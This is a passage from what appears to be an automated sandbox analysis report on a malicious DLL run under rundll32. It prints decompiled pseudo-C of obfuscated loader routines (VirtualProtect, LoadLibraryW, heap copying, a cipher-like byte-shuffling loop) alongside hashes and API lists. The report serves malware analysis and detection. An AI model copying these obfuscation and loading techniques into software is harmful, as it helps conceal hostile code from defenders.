																goto L28;
															} else {
																_t574 =  *0x1003610c; // 0x0
																_t1144 =  *0x10036120; // 0x0
																_t851 =  *0x10036110; // 0x0
																_t1067 =  *0x1003611c; // 0x0
																_t644 =  *0x10036118; // 0x0
																_push(((_t1144 * _t574 - _t851 + _t1067) *  *0x10036114 - (_t851 + _t644 << 2) + (2 - _t1067) * _t574 << 7) + _t1235);
																_t575 = E10002ED0();
																_t1355 = _t1355 + 4;
																if(_t575 == 0) {
																	goto L28;
																} else {
																	_t857 =  *0x10036120; // 0x0
																	_t1068 =  *0x10036110; // 0x0
																	_t576 =  *0x10036118; // 0x0
																	_t1072 =  *0x1003611c; // 0x0
																	_t333 = _t576 + 2; // 0x2
																	_t577 = E100033D0(((_t1072 + _t333) *  *0x10036114 - (_t857 + _t1068 * 2 + _t576 << 1) - (_t857 + _t576) *  *0x1003610c + _t1072 << 6) + _t1235);
																	_t1355 = _t1355 + 4;
																	if(_t577 != 0) {
																		_t652 =  *((intOrPtr*)( *_t1235 + 0x28));
																		if(_t652 == 0) {
																			 *((intOrPtr*)(_t1235 + 0x38)) = 0;
																			return _t1235;
																		} else {
																			_t1073 =  *0x10036114; // 0x0
																			if( *(_t1235 + 0x14) == 0) {
																				_t1315 =  *0x1003611c; // 0x0
																				_t1155 =  *0x10036118; // 0x0
																				 *((intOrPtr*)(_t1235 + 0x38)) = _t652 + (_t1073 - _t1315 - _t1155) * 2 +  *((intOrPtr*)(_t1355 + 0x14));
																				return _t1235;
																			} else {
																				_t861 =  *0x10036120; // 0x0
																				_t1157 =  *0x10036110; // 0x0
																				_t586 =  *0x10036118; // 0x0
																				 *0x1003819c = _t652 + ((_t1157 + _t1157 - _t861 * _t1073 - _t586) *  *0x1003611c - _t586 + _t586 * 2 - _t861 + _t1157 + _t1073) * 2 +  *((intOrPtr*)(_t1355 + 0x14));
																				 *((intOrPtr*)(_t1235 + 0x10)) = 1;
																				return _t1235;
																			}
																		}
																	} else {
																		goto L28;
																	}
																}
															}
														}
													}
												} else {
													_t669 =  *0x1003611c; // 0x0
													 *((intOrPtr*)(_t1354 + 0x7c))(_t1117, 0, (_t801 *  *0x1003610c + _t1013) * 0x7fffffff + _t669 + (_t801 *  *0x1003610c + _t1013) * 0x7fffffff + _t669 + 0x8000,  *((intOrPtr*)(_t1354 + 0x7c)));
													return 0;
												}
											} else {
												_t877 =  *0x10036114; // 0x0
												_t596 =  *0x1003611c; // 0x0
												_t670 =  *0x10036118; // 0x0
												_t1087 =  *0x10036120; // 0x0
												_t200 = _t1087 * 0x7ffffffe - _t877 * _t596 *  *0x1003610c - _t670 + 4; // 0x4
												_t1241 = _t877 * _t877;
												 *(_t1354 + 0x1c) = _t1241;
												_t1173 =  *0x10036110; // 0x0
												_t205 = ((_t1241 * _t670 + 2 + _t1087 * 0x7fffffff) * _t877 + (_t670 + _t1173) * 0x7fffffff) * 2; // 0x2002
												_t1350 =  *0x10036118; // 0x0
												_t599 =  *((intOrPtr*)(_t1354 + 0x7c))(0, (( ~_t1173 << 1) - (_t1087 * _t877 << 2) + 2) * _t1087 +  *((intOrPtr*)(_t1354 + 0x28)) + (_t596 + _t596 - _t1350) * 2, (0x00000002 - (_t596 * _t596 << 0x00000001)) * _t596 + _t205 + 0x00002000 | ((0x00000001 - _t1087) *  *0x1003610c - _t1173 - _t877 - 0x00000001) *  *0x10036118 + (_t1087 * _t596 * _t596 + 0x00000001) * _t1087 -  *0x1003610c +  *(_t1354 + 0x1c) + _t877 + _t596 + 0x00001000, _t1087 * 0x7ffffffe - _t877 * _t596 *  *0x1003610c - _t670 + _t200,  *((intOrPtr*)(_t1354 + 0x7c)));
												_t1354 = _t1354 + 0x14;
												 *((intOrPtr*)(_t1354 + 0x14)) = _t599;
												if(_t599 == 0) {
													goto L29;
												} else {
													_t618 =  *((intOrPtr*)(_t1354 + 0x10));
													_t1117 = _t599;
													goto L18;
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

APIs

GetNativeSystemInfo.KERNEL32(?,7FFFFFFE,00000000,?,?,?,?,?,?,?,?,?,?,1000640C,00000000,00000000), ref: 1000504B
GetProcessHeap.KERNEL32(?,?), ref: 1000544C
HeapAlloc.KERNEL32(00000000), ref: 10005453
memcpy.MSVCRT ref: 1000570F

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Heap$AllocInfoNativeProcessSystemmemcpy
String ID:
API String ID: 1755227880-0
Opcode ID: 993f834cee51f2432c2c346b15c4fd7da4b8477cae012179afaf0030763fae0d
Instruction ID: f49f43f9c300581c81497aa9a595f87392b237f3bd22c5b5458b9e07c05fb177
Opcode Fuzzy Hash: 993f834cee51f2432c2c346b15c4fd7da4b8477cae012179afaf0030763fae0d
Instruction Fuzzy Hash: 6CA283327002158FD70DCF28CED6555BBEAF7CE310B09D62ED9158F3A6EA74A905CA80

Uniqueness

Uniqueness Score: -1.00%

Function 00C3F6A1 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00C3F6A1(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t31;
				struct HINSTANCE__* _t37;
				WCHAR* _t40;

				_push(_a12);
				_t40 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00C332C4(_t31);
				_v28 = 0xc52aa;
				_v24 = 0x95615;
				_v20 = 0x738ab;
				_v16 = 0x613b6f;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x0c263f45;
				_v8 = 0x987e64;
				_v8 = _v8 + 0xffff93dc;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x46a8;
				_v8 = _v8 ^ 0x00098c86;
				_v12 = 0x302d8a;
				_v12 = _v12 << 0xe;
				_v12 = _v12 | 0xe7847ef7;
				_v12 = _v12 ^ 0xefed21e1;
				E00C252F2(__ecx, __edx, __ecx, 0xa2, 0xef13742b, 0x9f49d153);
				_t37 = LoadLibraryW(_t40); // executed
				return _t37;
			}

0x00c3f6a8
0x00c3f6ab
0x00c3f6ad
0x00c3f6b0
0x00c3f6b3
0x00c3f6b4
0x00c3f6b5
0x00c3f6ba
0x00c3f6c4
0x00c3f6cb
0x00c3f6d2
0x00c3f6d9
0x00c3f6dd
0x00c3f6e4
0x00c3f6eb
0x00c3f6f2
0x00c3f6f6
0x00c3f6fd
0x00c3f704
0x00c3f70b
0x00c3f70f
0x00c3f716
0x00c3f736
0x00c3f73f
0x00c3f745

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00C3F73F

Strings

o;a, xrefs: 00C3F6D2
CJD, xrefs: 00C3F6A1
!, xrefs: 00C3F716

Memory Dump Source

Source File: 00000003.00000002.406684150.0000000000C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000003.00000002.406640645.0000000000C20000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.406712811.0000000000C42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c20000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: o;a$!$CJD
API String ID: 1029625771-3784180784
Opcode ID: c45b9c2f0ee65167d17a9d1f18105e346d1cc9d46464ba724809973fdadbd5d7
Instruction ID: 27e6ca2b543412b843d4ae2a8e004df2989d9d3f710799265e547ac3598271e0
Opcode Fuzzy Hash: c45b9c2f0ee65167d17a9d1f18105e346d1cc9d46464ba724809973fdadbd5d7
Instruction Fuzzy Hash: BF1112B6C01308BBCB01EFA4C80A88EBBB4EB10314F508088E91566251E3B98B54DF91

Uniqueness

Uniqueness Score: -1.00%

Function 10026F03 Relevance: 4.6, APIs: 3, Instructions: 60
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E10026F03(intOrPtr __ecx, void* __eflags) {
				void* _t37;
				intOrPtr _t54;
				void* _t56;

				E10011A8C(E1002A72B, _t56);
				_push(__ecx);
				_t54 = __ecx;
				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
				E100272F4(__ecx, __eflags); // executed
				 *((intOrPtr*)(_t56 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x1002bcdc;
				if( *((intOrPtr*)(_t56 + 8)) == 0) {
					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				} else {
					 *((intOrPtr*)(_t54 + 0x4c)) = E100123CD( *((intOrPtr*)(_t56 + 8)));
				}
				_t37 = E10027747();
				_t44 = _t37;
				_push(E10026E7B);
				_t7 = _t44 + 0x1070; // 0x1070
				 *((intOrPtr*)(E100285E7(_t7) + 4)) = _t54;
				 *((intOrPtr*)(_t54 + 0x28)) = GetCurrentThread();
				 *((intOrPtr*)(_t54 + 0x2c)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t37 + 4)) = _t54;
				 *((intOrPtr*)(_t54 + 0x40)) = 0;
				 *((intOrPtr*)(_t54 + 0x78)) = 0;
				 *((intOrPtr*)(_t54 + 0x60)) = 0;
				 *((intOrPtr*)(_t54 + 0x64)) = 0;
				 *((intOrPtr*)(_t54 + 0x50)) = 0;
				 *((intOrPtr*)(_t54 + 0x5c)) = 0;
				 *((intOrPtr*)(_t54 + 0x84)) = 0;
				 *((intOrPtr*)(_t54 + 0x54)) = 0;
				 *((short*)(_t54 + 0x8e)) = 0;
				 *((short*)(_t54 + 0x8c)) = 0;
				 *((intOrPtr*)(_t54 + 0x44)) = 0;
				 *((intOrPtr*)(_t54 + 0x88)) = 0;
				 *((intOrPtr*)(_t54 + 0x7c)) = 0;
				 *((intOrPtr*)(_t54 + 0x80)) = 0;
				 *((intOrPtr*)(_t54 + 0x6c)) = 0;
				 *((intOrPtr*)(_t54 + 0x70)) = 0;
				 *((intOrPtr*)(_t54 + 0x90)) = 0;
				 *((intOrPtr*)(_t54 + 0x98)) = 0;
				 *((intOrPtr*)(_t54 + 0x58)) = 0;
				 *((intOrPtr*)(_t54 + 0x68)) = 0;
				 *((intOrPtr*)(_t54 + 0x94)) = 0x200;
				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
				return _t54;
			}

APIs

__EH_prolog.LIBCMT ref: 10026F08

Part of subcall function 100272F4: __EH_prolog.LIBCMT ref: 100272F9

GetCurrentThread.KERNEL32 ref: 10026F56
GetCurrentThreadId.KERNEL32 ref: 10026F5F

Part of subcall function 100123CD: _strlen.LIBCMT ref: 100123D7
Part of subcall function 100123CD: _strcat.LIBCMT ref: 100123EB

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentH_prologThread$_strcat_strlen
String ID:
API String ID: 268772951-0
Opcode ID: 276c48dd1b96b31a62c856c06b76c29d4c71fae2a12c294a13216174a5a39cd3
Instruction ID: 1ea434eef89218c202f70ed0f3fdbcf79c7dfff6394bd0b9137d158ef3fdfccf
Opcode Fuzzy Hash: 276c48dd1b96b31a62c856c06b76c29d4c71fae2a12c294a13216174a5a39cd3
Instruction Fuzzy Hash: B5217CB4801B50CFD720CF2AD94469AFBF8FFA4240B50891FE5AA86B21CBB4A541CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10002BC0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E10002BC0() {
				intOrPtr _t86;
				signed int _t88;
				signed int _t93;
				signed int _t94;
				signed int _t97;
				signed int _t123;
				signed int _t141;
				signed int _t147;
				signed int _t161;
				signed int _t168;
				signed int _t175;
				signed int _t194;
				signed int _t196;
				intOrPtr* _t199;
				signed int _t200;
				long _t201;
				signed int _t203;
				signed int _t204;
				signed int _t210;
				signed int _t224;
				signed int _t225;
				signed int _t229;
				signed int _t251;
				signed int _t260;
				void* _t279;

				_t201 =  *(_t279 + 0x18);
				_t86 =  *((intOrPtr*)(_t201 + 8));
				 *((intOrPtr*)(_t279 + 8)) = _t86;
				if(_t86 != 0) {
					_t210 =  *0x1003610c; // 0x0
					_t175 =  *0x10036110; // 0x0
					_t229 =  *0x10036120; // 0x0
					 *((intOrPtr*)(_t279 + 0xc)) =  *((intOrPtr*)(_t201 + 0xc));
					_t203 =  *0x1003611c; // 0x0
					_t224 =  *0x10036118; // 0x0
					_t6 = _t210 - 1; // -1
					_t88 = _t6 * _t229;
					_t225 =  *0x10036114; // 0x0
					 *(_t279 + 0x1c) = _t88;
					_t9 = (_t224 * 0x7fffffff + _t203) * 2; // 0x1ffffff
					if(( *(_t279 + 0x10) & (_t88 + 0xfffffffc) * _t229 + (_t203 * _t224 - _t175 - 0x00000001) * _t175 + _t225 + _t9 + 0x02000000) == 0) {
						_t93 = _t210 * _t210;
						 *(_t279 + 0x14) = _t93;
						_t94 =  *0x10036118; // 0x0
						_t97 =  *0x10036118; // 0x0
						_t48 = (_t97 * 0x3fffffff + _t203) * 2; // 0x10000000
						asm("sbb ebx, ebx");
						_t51 = _t229 + 0x7fffffff; // 0x7fffffff
						asm("sbb ebp, ebp");
						asm("sbb eax, eax");
						_t194 =  *0x10036118; // 0x0
						 *(_t279 + 0x14) =  *(0x10036128 + ( ~( ~((( *(_t279 + 0x14) * _t229 + _t203) * _t225 -  *0x10036110) * _t203 +  *(_t279 + 0x1c) - 0x80000000 &  *(_t279 + 0x10))) + ( ~( ~(_t51 * _t229 + _t51 * _t229 + 0x40000000 &  *(_t279 + 0x10))) +  ~( ~((_t93 * _t94 * 0x7fffffff + _t225 * _t229) * _t225 + (_t94 + 0x7fffffff + (_t203 * 0x3fffffff + _t210) * 0x00000002) *  *0x10036110 + _t48 + 0x10000000 + _t229 * 0x7fffffff << 0x00000001 &  *(_t279 + 0x10))) * 2) * 2) * 4);
						_t251 =  *0x10036110; // 0x0
						_t67 = (1 - (_t203 * _t203 * _t229 * _t194 + _t251) * _t225 - _t229) * _t203 + _t225 + 0x4000000; // 0x4000001
						if(( *(_t279 + 0x10) & (0x00000001 - (_t203 * _t203 * _t229 * _t194 + _t251) * _t225 - _t229) * _t203 + _t225 + _t67) != 0) {
							 *(_t279 + 0x14) =  *(_t279 + 0x14) | 0x00000200 - _t203 - _t194;
						}
						_t123 =  *0x10036110; // 0x0
						_t74 = _t194 + 2; // 0x2
						_t260 =  *0x10036110; // 0x0
						_t204 =  *0x10036110; // 0x0
						_t82 = _t225 + 1; // 0x1
						_t141 = VirtualProtect( *( *(_t279 + 0x30)), ((_t260 * _t194 << 1) - (_t225 + _t203 << 1) + 2) * _t203 +  *((intOrPtr*)(_t279 + 0x20)) + ((_t204 + _t194) * 0x7fffffff + (_t210 * _t229 + _t82 * 0x7fffffff) * _t229 + _t225) * 2,  *(_t279 + 0x18), _t279 + 0x28 + ((_t123 - _t210 - _t229 + 1) * _t229 - (_t225 + _t74) * _t225 - _t194 + _t260 + ((_t123 - _t210 - _t229 + 1) * _t229 - (_t225 + _t74) * _t225 - _t194 + _t260) * 2) * 4); // executed
						asm("sbb eax, eax");
						return  ~( ~_t141);
					} else {
						_t147 =  *(_t279 + 0x28);
						_t196 =  *_t147;
						 *(_t279 + 0x14) = _t196;
						if(_t196 ==  *((intOrPtr*)(_t147 + 4))) {
							_t199 =  *((intOrPtr*)(_t279 + 0x24));
							if( *((intOrPtr*)(_t147 + 0x10)) != 0) {
								L8:
								_t39 = ((_t225 - _t203 + _t229) *  *0x10036110 - _t203 -  *0x10036118 + _t225 + _t210 + _t229) * 2; // -268640536
								 *((intOrPtr*)(_t199 + 0x20))( *(_t279 + 0x18),  *(_t279 + 0x1c), (_t225 - _t203 + _t229) *  *0x10036110 - _t203 -  *0x10036118 + _t225 + _t210 + _t229 + _t39 + 0x4000,  *((intOrPtr*)(_t199 + 0x34)));
							} else {
								_t161 =  *(_t199 + 0x3c);
								 *(_t279 + 0x28) = _t161;
								if( *((intOrPtr*)( *_t199 + 0x38)) == _t161) {
									goto L8;
								} else {
									_t200 =  *0x10036110; // 0x0
									_t23 = _t225 + 0x3fffffff; // 0x3fffffff
									_t168 =  *0x10036118; // 0x0
									if( *(_t279 + 0x18) %  *(_t279 + 0x28) + (((_t203 * _t203 * _t200 * 0x3fffffff + _t225 * _t225 * _t229) * _t203 + _t23) * _t229 - (_t210 * _t168 + _t200 + 1) * _t168 + _t203 * 0x3fffffff) * 4 == 0) {
										_t199 =  *((intOrPtr*)(_t279 + 0x24));
										_t210 =  *0x1003610c; // 0x0
										goto L8;
									}
								}
							}
						}
						return 1;
					}
				} else {
					return 1;
				}
			}

Strings

`gv, xrefs: 10002E97

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: `gv
API String ID: 0-976742683
Opcode ID: ddb8229b36c1e569842992b1100f392691254f9f8c1865d37d5cf40887b2d16a
Instruction ID: 35123656d4fabb3a1d51c6032c7c7db7984ad3ba38261295779c8e01731928ad
Opcode Fuzzy Hash: ddb8229b36c1e569842992b1100f392691254f9f8c1865d37d5cf40887b2d16a
Instruction Fuzzy Hash: 2291547174431A8FD308DF6CDDC2A45B7D9FB99710F08963AD524CF2E6F660E6158A80

Uniqueness

Uniqueness Score: -1.00%

Function 10001820 Relevance: 3.6, APIs: 2, Instructions: 619
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E10001820() {
				signed int _t283;
				void* _t284;
				signed int _t287;
				signed int _t296;
				signed int _t311;
				signed int _t325;
				signed int _t326;
				signed int _t328;
				signed int _t331;
				signed int _t336;
				signed int _t339;
				signed int _t341;
				signed int _t356;
				signed int _t370;
				signed int _t372;
				signed int _t375;
				signed int _t380;
				signed int _t383;
				signed int _t385;
				signed int _t400;
				signed int _t414;
				signed int _t415;
				signed int _t417;
				signed int _t420;
				signed int _t427;
				signed int _t448;
				signed int _t454;
				signed int _t461;
				signed int _t468;
				signed int _t474;
				signed int _t484;
				signed int _t485;
				signed int _t490;
				signed int _t491;
				signed int _t498;
				signed int _t499;
				signed int _t504;
				signed int _t509;
				signed int _t530;
				signed int _t531;
				signed int _t536;
				signed int _t541;
				signed int _t562;
				signed int _t563;
				signed int _t568;
				signed int _t573;
				signed int _t581;
				signed int _t582;
				signed int _t585;
				signed int _t586;
				signed int _t596;
				intOrPtr _t611;
				signed int _t620;
				signed int _t621;
				signed int _t626;
				signed int _t633;
				signed int _t650;
				signed int _t652;
				signed int _t653;
				signed int _t658;
				signed int _t665;
				signed int _t682;
				signed int _t684;
				signed int _t685;
				signed int _t690;
				signed int _t697;
				signed int _t714;
				signed int _t715;
				signed int _t718;
				signed int _t730;
				signed int _t737;
				signed int _t743;
				signed int _t744;
				signed int _t747;
				signed int _t754;
				signed int _t763;
				signed int _t764;
				signed int _t768;
				signed int _t770;
				signed int _t774;
				signed int _t776;
				signed int _t780;
				signed int _t782;
				signed int _t802;
				signed int _t803;
				signed int _t805;
				signed int _t806;
				intOrPtr _t824;
				signed int _t825;
				void* _t826;
				signed int _t833;
				void* _t834;
				void* _t835;

				_t824 =  *((intOrPtr*)(_t834 + 0x2c));
				_t833 = _t824 -  *((intOrPtr*)(_t834 + 0x28)) +  *((intOrPtr*)(_t834 + 0x30));
				_t283 =  *0x10036114; // 0x0
				_t5 = _t833 + 3; // 0x80000001
				_t490 = 0;
				 *((intOrPtr*)(_t834 + 0x18)) = 0;
				_t284 = malloc(0xf04 + _t283 * 4 - _t5 *  *0x10036120);
				_t763 =  *0x10036114; // 0x0
				 *(_t834 + 0x24) = _t284;
				_t825 =  *0x10036110; // 0x0
				_t287 =  *0x10036120; // 0x0
				_t835 = _t834 + 4;
				_t611 =  *((intOrPtr*)(_t835 + 0x3c));
				if((_t763 * 4 - _t824 -  *((intOrPtr*)(_t834 + 0x38)) +  *((intOrPtr*)(_t834 + 0x3c)) - 5) * _t287 + (0x782 - _t825) * 2 > 0) {
					do {
						_t18 = _t833 - 1; // 0x7ffffffd
						 *(_t18 *  *0x1003610c - _t287 + _t287 + _t490 + _t611) = _t490;
						_t468 =  *0x10036118; // 0x0
						_t754 =  *0x10036120; // 0x0
						 *(_t835 + 0x1c) = _t468 * _t754;
						 *(_t835 + 0x24) = _t754 *  *0x10036114;
						_t805 =  *0x10036120; // 0x0
						_t474 =  *0x1003611c; // 0x0
						_t806 =  *0x1003610c; // 0x0
						_t484 =  *0x10036118; // 0x0
						_t485 =  *0x10036120; // 0x0
						 *((char*)(((_t474 + 1) *  *0x10036114 + _t805 + 2) *  *0x1003611c + _t806 * 2 + (((_t474 + 1) *  *0x10036114 + _t805 + 2) *  *0x1003611c + _t806 * 2) * 2 + _t833 *  *0x10036120 -  *(_t835 + 0x24) -  *(_t835 + 0x24) -  *(_t835 + 0x24) -  *(_t835 + 0x1c) -  *(_t835 + 0x1c) -  *(_t835 + 0x1c) + _t468 *  *0x1003610c *  *0x10036110 + _t468 *  *0x1003610c *  *0x10036110 + _t468 *  *0x1003610c *  *0x10036110 + _t484 + _t484 + _t484 + _t485 + _t485 +  *((intOrPtr*)(_t835 + 0x20)) + _t490)) =  *((intOrPtr*)(_t490 %  *(_t835 + 0x44) +  *((intOrPtr*)(_t835 + 0x40))));
						_t763 =  *0x10036114; // 0x0
						_t287 =  *0x10036120; // 0x0
						_t490 = _t490 + 1;
					} while (_t490 < (_t763 * 4 -  *((intOrPtr*)(_t835 + 0x30)) -  *((intOrPtr*)(_t835 + 0x34)) +  *((intOrPtr*)(_t835 + 0x38)) - 5) * _t287 + (0x782 -  *0x10036110) * 2);
				}
				_t826 = 0;
				while(1) {
					_t491 =  *0x1003610c; // 0x0
					_t620 =  *0x10036118; // 0x0
					_t621 = _t620 *  *0x1003610c;
					 *(_t835 + 0x24) = _t621;
					_t296 =  *0x10036118; // 0x0
					_t53 = _t833 + 2; // 0x80000000
					asm("cdq");
					_t498 =  *0x1003611c; // 0x0
					 *(_t835 + 0x18) =  ~(_t763 + _t763 * 2);
					 *(_t835 + 0x14) = (( *(_t826 - (_t296 * _t763 + 1) *  *0x1003611c + (_t296 * _t763 + 1) *  *0x1003611c * 2 - _t53 *  *0x10036120 - _t763 + _t763 * 2 + _t611) & 0x000000ff) +  *((char*)(_t833 *  *0x1003611c *  *0x10036110 + _t491 * _t763 -  *0x10036118 -  *0x10036120 + _t621 +  *((intOrPtr*)(_t835 + 0x20)) + _t826)) +  *(_t835 + 0x14)) % 0xf04;
					_t626 = _t498 *  *0x1003610c;
					 *(_t835 + 0x1c) = _t626;
					_t311 =  *0x1003610c; // 0x0
					_t633 =  *0x10036110; // 0x0
					_t499 =  *0x10036120; // 0x0
					 *(_t835 + 0x28) = (_t311 - _t498 - 2 + (_t311 - _t498 - 2) * 2 - (_t626 * _t763 + _t626 * _t763 * 2 -  *((intOrPtr*)(_t835 + 0x38)) +  *((intOrPtr*)(_t835 + 0x30)) +  *((intOrPtr*)(_t835 + 0x34)) + 5) *  *0x10036120) * _t498;
					_t83 = _t833 + 1; // 0x7fffffff
					 *((char*)(_t835 + 0x13)) =  *((intOrPtr*)(( *(_t835 + 0x18) + 3) * _t763 + _t826 + ( *(_t835 + 0x24) - _t499 - _t633) * 2 +  *(_t835 + 0x24) - _t499 - _t633 +  *(_t835 + 0x28) + _t611));
					_t325 =  *0x10036120; // 0x0
					_t326 =  *0x1003611c; // 0x0
					_t504 =  *0x10036110; // 0x0
					_t764 =  *0x1003610c; // 0x0
					_t328 =  *0x10036110; // 0x0
					_t95 = _t833 + 2; // 0x80000000
					_t331 =  *0x10036120; // 0x0
					 *((char*)(_t331 + _t331 * 2 + ( *(_t835 + 0x18) + 0xfffffffd) * _t328 - _t95 *  *0x10036118 + _t826 + _t611)) =  *((intOrPtr*)(( *(_t835 + 0x1c) +  *(_t835 + 0x1c) - 2) * _t328 + (_t325 + _t325 - _t83 *  *0x1003610c + _t763 + _t763 + 2) * _t325 +  *(_t835 + 0x14) + ((_t504 - _t326 + 1) * _t763 + _t764) * 2 + _t611));
					_t650 =  *0x10036118; // 0x0
					_t768 =  *0x10036110; // 0x0
					_t509 =  *0x1003611c; // 0x0
					_t336 =  *0x1003610c; // 0x0
					_t102 = _t833 + 3; // 0x80000001
					 *((char*)((_t509 - _t650 * _t768 - _t650 - _t768 + _t336 << 1) - _t102 *  *0x10036120 +  *(_t835 + 0x14) + _t611)) =  *((intOrPtr*)(_t835 + 0x13));
					_t770 =  *0x10036114; // 0x0
					_t339 =  *0x1003610c; // 0x0
					_t652 =  *0x10036118; // 0x0
					_t653 = _t652 *  *0x1003610c;
					_t341 =  *0x10036118; // 0x0
					 *(_t835 + 0x24) = _t653;
					_t110 = _t833 + 2; // 0x80000000
					asm("cdq");
					_t530 =  *0x1003611c; // 0x0
					 *(_t835 + 0x18) =  ~(_t770 + _t770 * 2);
					 *(_t835 + 0x14) = (( *(_t826 - (_t341 * _t770 + 1) *  *0x1003611c + (_t341 * _t770 + 1) *  *0x1003611c * 2 - _t110 *  *0x10036120 - _t770 + _t770 * 2 + _t611 + 1) & 0x000000ff) +  *((char*)(_t833 *  *0x1003611c *  *0x10036110 + _t339 * _t770 - _t341 -  *0x10036120 + _t653 +  *((intOrPtr*)(_t835 + 0x20)) + _t826 + 1)) +  *(_t835 + 0x14)) % 0xf04;
					_t658 = _t530 *  *0x1003610c;
					 *(_t835 + 0x1c) = _t658;
					_t356 =  *0x1003610c; // 0x0
					_t531 =  *0x10036120; // 0x0
					_t665 =  *0x10036110; // 0x0
					 *(_t835 + 0x28) = (_t356 - _t530 - 2 + (_t356 - _t530 - 2) * 2 - (_t658 * _t770 + _t658 * _t770 * 2 -  *((intOrPtr*)(_t835 + 0x38)) +  *((intOrPtr*)(_t835 + 0x30)) +  *((intOrPtr*)(_t835 + 0x34)) + 5) *  *0x10036120) * _t530;
					 *((char*)(_t835 + 0x13)) =  *((intOrPtr*)(( *(_t835 + 0x18) + 3) * _t770 + _t826 + ( *(_t835 + 0x24) - _t531 - _t665) * 2 +  *(_t835 + 0x24) - _t531 - _t665 +  *(_t835 + 0x28) + _t611 + 1));
					_t143 = _t833 + 1; // 0x7fffffff
					_t370 =  *0x10036120; // 0x0
					_t536 =  *0x10036110; // 0x0
					_t372 =  *0x10036110; // 0x0
					_t154 = _t833 + 2; // 0x80000000
					_t375 =  *0x10036120; // 0x0
					 *((char*)(_t375 + _t375 * 2 + ( *(_t835 + 0x18) + 0xfffffffd) * _t372 - _t154 *  *0x10036118 + _t826 + _t611 + 1)) =  *((intOrPtr*)(( *(_t835 + 0x1c) +  *(_t835 + 0x1c) - 2) * _t372 + (_t370 + _t370 - _t143 *  *0x1003610c + _t770 + _t770 + 2) * _t370 +  *(_t835 + 0x14) + ((_t536 -  *0x1003611c + 1) * _t770 +  *0x1003610c) * 2 + _t611));
					_t682 =  *0x10036118; // 0x0
					_t774 =  *0x10036110; // 0x0
					_t541 =  *0x1003611c; // 0x0
					_t380 =  *0x1003610c; // 0x0
					_t162 = _t833 + 3; // 0x80000001
					 *((char*)((_t541 - _t682 * _t774 - _t682 - _t774 + _t380 << 1) - _t162 *  *0x10036120 +  *(_t835 + 0x14) + _t611)) =  *((intOrPtr*)(_t835 + 0x13));
					_t776 =  *0x10036114; // 0x0
					_t383 =  *0x1003610c; // 0x0
					_t684 =  *0x10036118; // 0x0
					_t685 = _t684 *  *0x1003610c;
					_t385 =  *0x10036118; // 0x0
					 *(_t835 + 0x24) = _t685;
					_t170 = _t833 + 2; // 0x80000000
					asm("cdq");
					_t562 =  *0x1003611c; // 0x0
					 *(_t835 + 0x18) =  ~(_t776 + _t776 * 2);
